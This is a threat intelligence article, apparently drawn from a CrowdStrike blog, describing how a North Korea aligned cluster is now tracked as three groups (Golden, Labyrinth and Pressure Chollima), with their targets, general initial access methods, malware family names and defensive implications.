Labyrinth Chollima Splits Into Three Cyber Adversaries

Recent threat intelligence analysis shows that what was once treated as a single North Korea aligned activity cluster has matured into three clearly differentiated adversary groups. These groups operate under the Chollima umbrella but pursue distinct objectives, targets, and technical tradecraft. The evolution highlights how state aligned cyber operations scale by specialization rather than centralization.

Source: Crowdstrike blog

The three groups are now tracked as Golden Chollima, Labyrinth Chollima, and Pressure Chollima.

Golden Chollima: Financially Motivated Operations

Mission and Targeting

Golden Chollima focuses primarily on cryptocurrency theft. Its targeting centers on small to mid sized fintech firms and cryptocurrency service providers across the United States, Canada, South Korea, India, and Western Europe.

Tradecraft and Initial Access

The group heavily relies on malicious applications disguised as cryptocurrency trading tools. These lures are often combined with supply chain compromise and HR themed social engineering to gain execution on developer or finance systems. Golden Chollima has also demonstrated the ability to exploit Chromium zero day vulnerabilities in cloud conscious intrusion campaigns.

Malware Ecosystem

Golden Chollima’s tooling emphasizes theft and persistence, with malware families such as Jeus, AppleJeus, SnakeBaker, NodaliBaker, and HTTPHelper. These tools are optimized for credential harvesting, wallet access, and lateral movement in financial environments.

Labyrinth Chollima: Strategic Intelligence Collection

Source: LABYRINTH CHOLLIMA successors

Mission and Targeting

Labyrinth Chollima is the most espionage focused of the three groups. Its operations target defense, maritime, nuclear, logistics, military, and government sectors, primarily in the United States, Europe, and South Korea.

Initial Access and Exploitation

This group uses fake PDF readers, trojanized open source projects, and HR themed social engineering to deliver malware. Labyrinth Chollima also deploys TightVNC for interactive access and has demonstrated the use of zero day vulnerabilities to establish initial footholds.

Advanced Tooling

Its malware stack is broader and more stealth focused than the other groups. Known tools include Hoplight, HTTPHoplight, OpenSSLDownloader, UnderGroundRAT, HiberRAT, NedDownloader, and FudModule. These implants support long term persistence, encrypted command and control, and modular tasking.

Pressure Chollima: High Value Financial Targeting

Mission and Targeting

Pressure Chollima also focuses on cryptocurrency theft but prioritizes large centralized exchanges and technology firms. Its operations span the United States, Europe, India, and East Asia, suggesting a more aggressive revenue generation mandate.

Infection Chains

This group commonly abuses malicious cryptocurrency themed applications, trojanized Node.js and Python projects, and supply chain compromise. The approach allows Pressure Chollima to reach high value targets through trusted developer ecosystems.

Malware Arsenal

Pressure Chollima employs a diverse malware portfolio, including MataNet, SparkDownloader, TwoPence Electric, MagicCookie, StatusSymbol, Scuzzyfuss, IndexSymbol, GhostShip, and AlertConf. These tools enable payload staging, command execution, and data exfiltration at scale.

Comparative Technical Breakdown

Defensive Implications

The emergence of three specialized Chollima groups increases detection complexity. While infrastructure and tooling differ, shared themes such as developer ecosystem abuse and social engineering remain consistent. Defenders should prioritize behavioral detection, software supply chain monitoring, and continuous threat hunting.

This evolution shows how modern state aligned adversaries scale operations by dividing missions, tooling, and targets rather than relying on a single monolithic threat actor.